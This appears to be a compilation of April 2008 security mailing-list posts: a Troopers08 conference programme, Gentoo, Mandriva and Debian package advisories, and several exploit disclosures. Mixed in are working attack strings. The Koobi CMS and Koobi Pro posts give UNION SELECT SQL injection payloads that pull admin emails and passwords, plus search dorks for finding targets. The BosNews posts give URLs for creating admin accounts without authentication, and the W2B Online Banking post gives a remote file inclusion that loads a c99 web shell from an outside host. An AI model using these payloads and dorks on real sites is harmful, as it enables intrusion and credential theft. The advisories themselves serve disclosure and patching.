Troopers08 Security Conference, April 23/24 (Munich/Germany)
Troopers08 Presentations Keynote on Invulnerable Software - Dan Bernstein KIDS - Kernel Intrusion Detection System - Rodrigo Branco State of Security - Andrew Cushman, Microsoft Release of the next revision of the free Exploit-Me series of application penetration testing tools - Nish Bhalla, Security Compass Side Channel Analysis - Job de Haas, Riscure Hackertools according to German law (? 202c StGB) - Horst Speichert, Lawyer Hardening Oracle in Corporate Environments - Alexander Kornbrust, Red-Database-Security Virtualization: There is no spoon - Michael Kemp Straight Talk about Cryptography - Jon Callas, PGP Evilgrade: You have pending upgrades - Francisco Amato Self defending networks - hype or essential need for international organisations? - Rolf Strehle, VOITH AG Keynote Virtualization: Floor Wax, Dessert Topping and The End of Information Security As We Know It? - Christopher Hoff, Unisys GPUs, password recovery and thunder tables - Andrey Belenko, ElcomSoft Incident Management - tasks and organization. - Volker Kozok, German Ministry of Defense A penetration testing learning kit - Ariel Waissbein, Core Security Organizing and analyzing logdata with entropy - Sergey Bratus, Dartmouth College The Art of Reversing - Michael Thumann, ERNW GmbH Enterprise Webapplication Security [EMAIL PROTECTED] S.E., Dr. Johannes Raab, Allianz S.E. Tapping $$$ Enterprises - Pierre Kroma Virtual Honey Pots - Thorsten Holz, Universitaet Mannheim SCADA and National Critical Infrastructures: is security an optional? - Raoul Chiesa Data Loss Protection - Hope or Hype? - Enno Rey Angus Blitter thanks, -- Enno Rey ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902 PGP FP 055F B3F3 FE9D 71DD C0D5 444E C611 033E 3296 1CC1 Handelsregister Heidelberg: HRB 7135 Geschaeftsfuehrer: Roland Fiege, Enno Rey
[ GLSA 200804-15 ] libpng: Execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200804-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: libpng: Execution of arbitrary code Date: April 15, 2008 Bugs: #217047 ID: 200804-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability in libpng may allow for execution of arbitrary code in certain applications that handle untrusted images. Background == libpng is a free ANSI C library used to process and manipulate PNG images. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 media-libs/libpng 1.2.26-r1 = 1.2.26-r1 Description === Tavis Ormandy of the Google Security Team discovered that libpng does not handle zero-length unknown chunks in PNG files correctly, which might lead to memory corruption in applications that call png_set_read_user_chunk_fn() or png_set_keep_unknown_chunks(). Impact == A remote attacker could entice a user or automated system to process a specially crafted PNG image in an application using libpng and possibly execute arbitrary code with the privileges of the user running the application. Note that processing of unknown chunks is disabled by default in most PNG applications, but some such as ImageMagick are affected. Workaround == There is no known workaround at this time. Resolution == All libpng users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =media-libs/libpng-1.2.26-r1 References == [ 1 ] CVE-2008-1382 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1382 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200804-15.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[ GLSA 200804-14 ] Opera: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200804-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Opera: Multiple vulnerabilities Date: April 14, 2008 Bugs: #216022 ID: 200804-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been discovered in Opera, allowing for execution of arbitrary code. Background == Opera is a fast web browser that is available free of charge. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-client/opera9.27 = 9.27 Description === Michal Zalewski reported two vulnerabilities, memory corruption when adding news feed sources from a website (CVE-2008-1761) as well as when processing HTML CANVAS elements to use scaled images (CVE-2008-1762). Additionally, an unspecified weakness related to keyboard handling of password inputs has been reported (CVE-2008-1764). Impact == A remote attacker could entice a user to visit a specially crafted web site or news feed and possibly execute arbitrary code with the privileges of the user running Opera. Workaround == There is no known workaround at this time. Resolution == All Opera users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-client/opera-9.27 References == [ 1 ] CVE-2008-1761 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1761 [ 2 ] CVE-2008-1762 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1762 [ 3 ] CVE-2008-1764 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1764 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200804-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
[ GLSA 200804-13 ] Asterisk: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200804-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Asterisk: Multiple vulnerabilities Date: April 14, 2008 Bugs: #200792, #202733, #213883 ID: 200804-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities have been found in Asterisk allowing for SQL injection, session hijacking and unauthorized usage. Background == Asterisk is an open source telephony engine and tool kit. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-misc/asterisk 1.2.27 = 1.2.27 Description === Asterisk upstream developers reported multiple vulnerabilities: * The Call Detail Record Postgres logging engine (cdr_pgsql) does not correctly escape the ANI and DNIS arguments before using them in SQL statements (CVE-2007-6170). * When using database-based registrations (realtime) and host-based authentication, Asterisk does not check the IP address when the username is correct and there is no password provided (CVE-2007-6430). * The SIP channel driver does not correctly determine if authentication is required (CVE-2008-1332). Impact == Remote authenticated attackers could send specially crafted data to Asterisk to execute arbitrary SQL commands and compromise the administrative database. Remote unauthenticated attackers could bypass authentication using a valid username to hijack other user's sessions, and establish sessions on the SIP channel without authentication. Workaround == There is no known workaround at this time. Resolution == All Asterisk users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-misc/asterisk-1.2.27 References == [ 1 ] CVE-2007-6170 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6170 [ 2 ] CVE-2007-6430 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6430 [ 3 ] CVE-2008-1332 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1332 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200804-13.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
Dotclear 'ecrire/images.php' Arbitrary File Upload Vulnerability
# Advisory #1 Dotclear 'ecrire/images.php' Arbitrary File Upload Vulnerability $ Author : Morgan ARMAND $ Contact : armand_m at epitech dot net $ Vendor URL : http://www.dotclear.net $ Vendor Contacted : 07/04/2008 $ Vendor Status : No response $ Affected Software : Dotclear = 1.2.7.1 $ Severity : Medium / Critical # Vulnerability: Dotclear is prone to an arbitrary script upload vulnerability. The vulnerability is caused due to missing validation of the file extension. If successfully exploited, an attacker can execute arbitrary script code on a vulnerable server. You need to have an account in order to access to the vulnerable page. All versions of Dotclear are considered vulnerable at the moment.
BosNews v4.0 Remote add user admin
-- - H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo - -- = Author : HouSSaMix = Script : BosNews = version : 4.0 = Download : http://www.bosdev.com/ = Dork : Powered by BosNews = BUG : Remote add user admin exploit = Target.com/path/newsadmin.php?action=create_account here u can add a new user admin = admin login Target.com/path/newsadmin.php
clamav: Endless loop / hang with crafter arj, CVE-2008-1387
Advisory published at: http://int21.de/cve/CVE-2008-1387-clamav.html clamav: Endless loop / hang with crafter arj, CVE-2008-1387 References http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1387 http://svn.clamav.net/svn/clamav-devel/trunk/ChangeLog http://www.cert.fi/haavoittuvuudet/joint-advisory-archive-formats.html Description CERT-FI published an advisory with a large number of samples of crafted archives. The file with the md5sum b6046d890e6bd304e3756c88b989559a (named b6046d890e6bd304e3756c88b989559a.arj) hangs clamav with high load. If you're running clamav on a mailserver, an attacker can DoS your Server remotely by sending some mails with the archive attached. Workaround/Fix clamav 0.93 fixes this issue beside other security issues, if you're running clamav you should upgrade as soon as possible. Disclosure Timeline 2008-03-17 CERT-FI publishes advisory 2008-03-26 Vendor contacted 2008-03-27 Vendor approves issue 2008-04-14 Vendor releases 0.93 2008-04-16 Advisory published CVE Information The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-1387 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. Credits and copyright This vulnerability was discovered by Hanno Boeck of schokokeks.org webhosting. It's licensed under the creative commons attribution license. Hanno Boeck, 2008-04-16, http://www.hboeck.de -- Hanno Böck Blog: http://www.hboeck.de/ GPG: 3DBD3B20 Jabber/Mail:[EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part.
BosNews 2002-2006 Remote add user admin
-- - H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo - -- = Author : HouSSaMix = Script : BosNews = version : 2002-2006 = Download : http://www.bosdev.com/ = Dork : Powered by BosNews Copyright 2002-2006 = BUG : Remote add user admin exploit = Target.com/path/admin/index.php?action=create here u can add a new user admin = admin login Target.com/path/admin/index.php
Re: Secunia Research: Lotus Notes Folio Flat File Parsing Buffer Overflows
Autonomy Keyview Folio Flat File Parsing Buffer Overflows Autonomy Keyview Applix Graphics Parsing Vulnerabilities Autonomy Keyview EML Reader Buffer Overflows activePDF DocConverter Folio Flat File Parsing Buffer Overflows activePDF DocConverter Applix Graphics Parsing Vulnerabilities Lotus Notes Applix Graphics Parsing Vulnerabilities Lotus Notes Folio Flat File Parsing Buffer Overflows Lotus Notes EML Reader Buffer Overflows Lotus Notes kvdocve.dll Path Processing Buffer Overflow Lotus Notes htmsr.dll Buffer Overflows Symantec Mail Security Folio Flat File Parsing Buffer Overflows Symantec Mail Security Applix Graphics Parsing Vulnerabilities 12 mails for the same library? From what I have understood all the bugs are just in this Autonomy Keyview library so in my opinion reporting the same identical bugs in each software which uses this thirdy part component and additionally without saying that the problem in reality is in the library is wrong and leads to a lot of confusion. It's just like if someone finds a bug in zlib and releases 1 advisories, one for each program in the world which uses the library... the bug is not in these 1 programs but only in zlib. --- Luigi Auriemma http://aluigi.org
[ MDVSA-2008:086 ] - Updated kernel packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:086 http://www.mandriva.com/security/ ___ Package : kernel Date: April 15, 2008 Affected: Corporate 4.0 ___ Problem Description: The isdn_ioctl function in isdn_common.c in the Linux kernel prior to 2.6.23 allows local users to cause a denial of service via a crafted ioctl struct in which iocts is not null terminated, which trigger a buffer overflow (CVE-2007-6151). The do_corefump function in fs/exec.c in the Linux kernel prior to 2.6.24-rc3 did not change the UID of a core dump file if it exists before a root process creates a core dump in the same location, which could possibly allow local users to obtain sensitive information (CVE-2007-6206). The shmem_getpage function in mm/shmem.c in the Linux kernel versions 2.6.11 through 2.6.23 did not properly clear allocated memory in certain rare circumstances related to tmps, which could possibly allow local users to read sensitive kernel data or cause a crash (CVE-2007-6417). Additionally, this kernel provides a fix for megaraid_sas and updates it to version 3.13, updates mptsas to version 3.12.19, and updates e1000-ng to version 7.6.12, as well as adds igb version 1.0.8. To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6151 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6417 ___ Updated Packages: Corporate 4.0: 4ecd928352ae1a0e37af030841e1daca corporate/4.0/i586/kernel-2.6.12.34mdk-1-1mdk.i586.rpm e25d7be22e3e194dd1f50409d0e71b90 corporate/4.0/i586/kernel-BOOT-2.6.12.34mdk-1-1mdk.i586.rpm e42a62385fd608bf8d9b3ec62d6684e8 corporate/4.0/i586/kernel-doc-2.6.12.34mdk-1-1mdk.i586.rpm 0522dc2efc14a6fb456bed196e5ef87e corporate/4.0/i586/kernel-i586-up-1GB-2.6.12.34mdk-1-1mdk.i586.rpm 723df91e8a94e9e4654a30875fe9de94 corporate/4.0/i586/kernel-i686-up-4GB-2.6.12.34mdk-1-1mdk.i586.rpm b276ba8700f7e611bfdf02b3b26c4796 corporate/4.0/i586/kernel-smp-2.6.12.34mdk-1-1mdk.i586.rpm 0a369c5c6e085596c2fa579074e0eed0 corporate/4.0/i586/kernel-source-2.6.12.34mdk-1-1mdk.i586.rpm 53e34bb761dbf927ec911248aee1f23b corporate/4.0/i586/kernel-source-stripped-2.6.12.34mdk-1-1mdk.i586.rpm c10f59cf9d289f0e9e8cdeb4e7fb3f0e corporate/4.0/i586/kernel-xbox-2.6.12.34mdk-1-1mdk.i586.rpm 90a86dd0e5fb9d62edd9682f5a86f978 corporate/4.0/i586/kernel-xen0-2.6.12.34mdk-1-1mdk.i586.rpm af3beaab8bf06f0beef21158e5d6878e corporate/4.0/i586/kernel-xenU-2.6.12.34mdk-1-1mdk.i586.rpm 5137cdde7b33a50562d783ee93bfa608 corporate/4.0/SRPMS/kernel-2.6.12.34mdk-1-1mdk.src.rpm Corporate 4.0/X86_64: 371f8a2b038bbe058dea1666b3b186da corporate/4.0/x86_64/kernel-2.6.12.34mdk-1-1mdk.x86_64.rpm c7c9bfe79048fb2f94ca600ddd2da911 corporate/4.0/x86_64/kernel-BOOT-2.6.12.34mdk-1-1mdk.x86_64.rpm a27a0da5b9e28ce0193a83a75e6e73c8 corporate/4.0/x86_64/kernel-doc-2.6.12.34mdk-1-1mdk.x86_64.rpm 7615a2c0aee3363886f159f4bfc5f538 corporate/4.0/x86_64/kernel-smp-2.6.12.34mdk-1-1mdk.x86_64.rpm 0e896d19f066f836fcfb7dd470522d0c corporate/4.0/x86_64/kernel-source-2.6.12.34mdk-1-1mdk.x86_64.rpm b09194d6e8a07b1ae836be6335808464 corporate/4.0/x86_64/kernel-source-stripped-2.6.12.34mdk-1-1mdk.x86_64.rpm 6845355d4579b2f2933935c88567981b corporate/4.0/x86_64/kernel-xen0-2.6.12.34mdk-1-1mdk.x86_64.rpm f0e8c8777c6da9db4dbea6de1b0fc920 corporate/4.0/x86_64/kernel-xenU-2.6.12.34mdk-1-1mdk.x86_64.rpm 5137cdde7b33a50562d783ee93bfa608 corporate/4.0/SRPMS/kernel-2.6.12.34mdk-1-1mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux)
[SECURITY] [DSA 1540-2] New lighttpd packages fix denial of service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1540-2 [EMAIL PROTECTED] http://www.debian.org/security/ Steve Kemp April 15, 2008http://www.debian.org/security/faq - Package: lighttpd Vulnerability : DOS Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-1531 It was discovered that lighttpd, a fast webserver with minimal memory footprint, was didn't correctly handle SSL errors. This could allow a remote attacker to disconnect all active SSL connections. This security update fixes a regression in the previous one, which caused SSL failures. For the stable distribution (etch), this problem has been fixed in version 1.4.13-4etch8. We recommend that you upgrade your lighttpd package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch8.diff.gz Size/MD5 checksum:37420 89efdab79fcbac119000a64cab648fcd http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13.orig.tar.gz Size/MD5 checksum: 793309 3a64323b8482b0e8a6246dbfdb4c39dc http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch8.dsc Size/MD5 checksum: 1098 87a04c4e704dd7921791bc44407b5e0e Architecture independent packages: http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-doc_1.4.13-4etch8_all.deb Size/MD5 checksum:99618 ae68b64b7c0df0f0b3a9d19b87e7c40a amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch8_amd64.deb Size/MD5 checksum: 297300 19f5b871d2a9a483e1ecdaa2325c45cb http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch8_amd64.deb Size/MD5 checksum:63586 750cf5f5d7671986b195366f2335c9cc http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch8_amd64.deb Size/MD5 checksum:63884 72ee2b52772010ae7c63a0a2b4761ff5 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch8_amd64.deb Size/MD5 checksum:59138 45672a1a3af65311693a3aee58be5566 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch8_amd64.deb Size/MD5 checksum:69890 b84d4ea8c9af282e2aeeb5c05847a95a http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch8_amd64.deb Size/MD5 checksum:60742 f48ef372b71be1b2683d03b411c7e7cf hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch8_hppa.deb Size/MD5 checksum:59896 60a4e61e9b5e2bafbf53474d677b36bb http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch8_hppa.deb Size/MD5 checksum: 323946 642f46921f99dfdf8e52ed3777847cbc http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-trigger-b4-dl_1.4.13-4etch8_hppa.deb Size/MD5 checksum:61890 4feb260d9f611c26979872b49b09ebc1 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-magnet_1.4.13-4etch8_hppa.deb Size/MD5 checksum:65000 2ce28ddd20bcd1bf407e14bae053537b http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch8_hppa.deb Size/MD5 checksum:72946 33c93c114c3807d63bb18a5a9b3f33b9 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch8_hppa.deb Size/MD5 checksum:65520 82a4460351af3d4c8b9d84ec831bd006 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-cml_1.4.13-4etch8_i386.deb Size/MD5 checksum:63884 96876134f02cf6b3c5079d5deecca7d9 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-mysql-vhost_1.4.13-4etch8_i386.deb Size/MD5 checksum:59086 f928fd96f37229e72661fa7140a0daa9 http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd_1.4.13-4etch8_i386.deb Size/MD5 checksum: 289088 477ce333d4a1b9f506645ff22193191f http://security.debian.org/pool/updates/main/l/lighttpd/lighttpd-mod-webdav_1.4.13-4etch8_i386.deb Size/MD5 checksum:70932 90cd2be30fb0f0e0ff97820e1b8c19f1
Koobi CMS 4.2.4/4.2.5/4.3.0 Multiple Remote SQL Injection Vulnerabilities
--==+=== Spanish Hackers Team (www.spanish-hackers.com) =+==-- --==+ Koobi CMS 4.3.0, 4.2.5, 4.2.4 Multiple Remote SQL Injection +==-- --==++==-- [+] [JosS] + [Spanish Hackers Team] + [Sys - Project] [+] Info: [~] Software: Koobi CMS 4.3.0, 4.2.5, 4.2.4 [~] HomePage: http://www.dream4.de/ [~] Exploit: Remote SQL Injection [High] [~] Where: index.php [~] Bug Found By: JosS [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [+] Dorks: [~] Koobi CMS 4.3.0: powered by koobi-cms 4.3.0 [~] Koobi CMS 4.2.5: powered by koobi-cms 4.2.5 [~] Koobi CMS 4.2.4: powered by koobi-cms 4.2.4 [+] Exploits for 4.3.0: [~] Module: gallery [~] /index.php?area=1p=galleryaction=showimagesgalid=[SQL] [~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/* [~] Module: downloads [~] /index.php?showfile=1fid=31p=downloadsarea=1categ=[SQL] [~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/* [+] Exploits for 4.2.5: [~] Module: links [~] /index.php?showlink=1fid=1p=linksarea=1categ=[SQL] [~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/* [~] Module: downloads [~] /index.php?showfile=1fid=1p=downloadsarea=1categ=[SQL] [~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/* [+] Exploits for 4.2.4: [~] Module: downloads [~] /index.php?showfile=1fid=31p=downloadsarea=1categ=[SQL] [~] Admin Data: -104+union+all+select+1,concat(email,0x203a3a20,pass),3+from+koobi4_user/* --==+=== Spanish Hackers Team (www.spanish-hackers.com) =+==-- --==+ JosS +==-- --==++==-- [+] [The End]
WordPress 2.5 - Salt cracking vulnerability
WORDPRESS 2.5 - SALT CRACKING VULNERABILITY
---
http://xiam.menteslibres.org/pages/advisories/wordpress-2-5-salt-cracking-vulnerability
By J. Carlos Nieto [EMAIL PROTECTED]
http://xiam.menteslibres.org
Severity
Medium. It affects only a determinate part of the WordPress users under
specific conditions.
Affected software
=
WordPress 2.5
Vulnerability conditions
After the initial WordPress instalation, the wp-config.php's SECRET_KEY
must remain as te default value: 'put your unique phrase here' or be
undefined, the default value remains untouched after installing via a
browser.
When the WordPress package is unpacked and the victim is ready to
install it, he will be asked to read the manual in order to create a
wp-config.php file, or to change permissions for the installation
directory to be writable. If he choose to change directory permissions,
the installation will be completely via web and the SECRET_KEY will
remain as the default value.
There exists some other conditions that let the user install WordPress
without even knowing that he must change a SECRET_KEY in wp-config.php
1.- If the user attempts to install WordPress on Windows. Since Windows
does not have a strong permissions check.
2.- If the user attempts to install WordPress under Apache + suexec. The
files are not readable or writable for all other users, but writable for
the user himself. Thus the installed won't ask you to read the manual.
3.- Some hosting companies have a one-click installer that does not
setup a SECRET_KEY.
4.- You failed to read the whole installation manual.
Vulnerable scripts
==
wp-include/pluggable.php
function wp_validate_auth_cookie($cookie) {
...
// The cookie is not being validated.
list($username, $expiration, $hmac) = explode('|', $cookie);
...
// I could send 99 as the second argument of the cookie to
skip this condition.
if ( $expired time() )
return false;
...
// A mysterious hash is used here, the hash becomes a seven
// character word generated by wp_generate_password()
// (a.k.a. SECRET_SALT), note that wp_salt() sets
// $secret_key to null if SECRET_KEY is equal to the default value.
.
// The argument passed to wp_hash() in the next line is
// completely poisonable.
// To gain admin privileges I could use:
// 'admin|99|MISTERIOUSHASH' as my cookie.
$key = wp_hash($username . $expiration);
$hash = hash_hmac('md5', $username . $expiration, $key);
// A weak check, I may provide a custom $hmac by knowing
// the wp_salt()'s value.
if ( $hmac != $hash )
return false;
// There is no password check, not even IP verification
$user = get_userdatabylogin($username);
}
...
function wp_salt() {
global $wp_default_secret_key;
$secret_key = '';
// If the key is null, not defined or has the default
// value $secret_key remains null
// if ( defined('SECRET_KEY') ('' != SECRET_KEY) (
$wp_default_secret_key != SECRET_KEY) )
$secret_key = SECRET_KEY;
if ( defined('SECRET_SALT') ) {
$salt = SECRET_SALT;
} else {
$salt = get_option('secret');
if ( empty($salt) ) {
$salt = wp_generate_password();
update_option('secret', $salt);
}
}
// $salt is a seven char long password. $secret_key is null.
return apply_filters('salt', $secret_key . $salt);
}
The wp_salt()'s value is stored here:
mysql select * from wp_options where option_name = 'secret';
+---+-+-+--+--+
| option_id | blog_id | option_name | option_value | autoload |
+---+-+-+--+--+
|61 | 0 | secret | eat5fsE | yes |
+---+-+-+--+--+
1 row in set (0.00 sec)
So if the attacker gets the value of that seven length string he can
craft a special cookie and gain access to ANY account he wants.
How can I know the value of wp_salt()?
--
I am thinking of two ways to get the value of the wp_salt():
1.- Gain access to the WP database by using a SQL injection (such as the
GBK encoding and addslashes() issue) on the WordPress core itself or on
a third party plugin (the latest is more likely to be possible). I din't
find any user-level SQL injection on the WP core.
2.- Register yourself on a WP 2.5 blog, log in and grab the cookie named
wordpress_MD5(SITE_URL), try to crack the value of the wp_salt() with an
offline attack using an specialized program.
Possible solution
=
Read The Fabulous Manual (a.k.a. RTFM) and realize that you have to
change the SECRET_KEY's value.
The SECRET_KEY should be changed automatically to something random.
Proof of concept
I wrote a bruteforce HMAC-MD5 cracker and adapted it to crack
wp_salt()'s values using a legitimate cookie as an argument.
This is the output of
Koobi Pro 6.25 poll Remote SQL Injection Vulnerability
## # # Koobi Pro 6.25 poll Remote SQL Injection Vulnerability # ## # ##AUTHOR : [EMAIL PROTECTED] # HOME : http://www.r57shell.in ##WEBSiTE: http://www.xcorpitx-hack.com/Forum/ BLOG : http://my.opera.com/SQL-Injection/blog/ MAiL : [EMAIL PROTECTED] # ### # # DORK 1 : allinurl: index.php?p=pollshowresult # # DORK 2 : allinurl: poll_id showresult # ### EXPLOiT : index.php?p=pollshowresult=1poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user * WEBSiTE: http://www.xcorpitx-hack.com/Forum * [EMAIL PROTECTED] *
remote file include
#
W2B Online Banking Remote File Inclusion Vulnerability
#
## AUTHOR: THuM4N
## Email : [EMAIL PROTECTED]
## Script : W2B Online Banking
## Site : http://www.w2b.ru
## Vulnerable CODE :
~~/index.php ~~
{
include($_SESSION[ilang]./.$_REQUEST[page]..htm);
~~~
## EXPLOIT :
http://[HOST]/[Path]/index.php?ilang=http://yoursite.com/c99.txt?
or
http://[HOST]/?ilang=http://yoursite.com/c99.txt?
## SPECIAL GREETZ : 2 All MUSLIM HACKERS.
## AND BIGUP 2 All Attackers Around The World .
#
W2B Online Banking Remote File Inclusion Vulnerability
#
# milw0rm.com [2008-04-15]
iDefense Security Advisory 04.14.08: ClamAV libclamav PE WWPack Heap Overflow Vulnerability
iDefense Security Advisory 04.14.08
http://labs.idefense.com/intelligence/vulnerabilities/
Apr 14, 2008
I. BACKGROUND
Clam AntiVirus is a multi-platform GPL anti-virus toolkit. ClamAV is
often integrated into e-mail gateways and used to scan e-mail traffic
for viruses. It supports virus scanning for a wide variety of packed
Portable Executable (PE) binaries. WWPack is one of the supported
packers. For more information visit the vendor's web site at the
following URL.
http://www.clamav.net/
II. DESCRIPTION
Remote exploitation of a heap overflow vulnerability in Clam AntiVirus'
ClamAV, as included in various vendors' operating system distributions,
allows attackers to execute arbitrary code with the privileges of the
affected process.
The vulnerability exists within the code responsible for reading in
sections within a PE binary packed with the WWPack executable
compressor. See the following excerpt from libclamav/pe.c:
1879 dsize = max-min+headsize-exe_sections[nsections - 1].rsz;
1883 if((dest = (char *) cli_calloc(dsize, sizeof(char))) ==
NULL) {
1897 for(i = 0 ; i (unsigned int)nsections-1; i++) {
1898 if(exe_sections[i].rsz) {
1899 if(!cli_seeksect(desc, exe_sections[i]) ||
(unsigned int) cli_readn(desc, dest + headsize + exe_sections[i].rva -
min, exe_sections[i].rsz) != exe_sections[i].rsz) {
The size of the allocated heap buffer is calculated on line 1879 using
several values that are under attacker control. The allocation takes
place on line 1883. Within the loop, starting on line 1897, data is
read into the allocated buffer (line 1899).
No validation is done to ensure that the resulting data is not written
outside the bounds of the dest buffer. The headsize,
exe_sections[i].rva, min, and exe_sections[i].rsz values that are
used for this operation are all under attacker control. As such, an
exploitable heap corruption condition may occur.
III. ANALYSIS
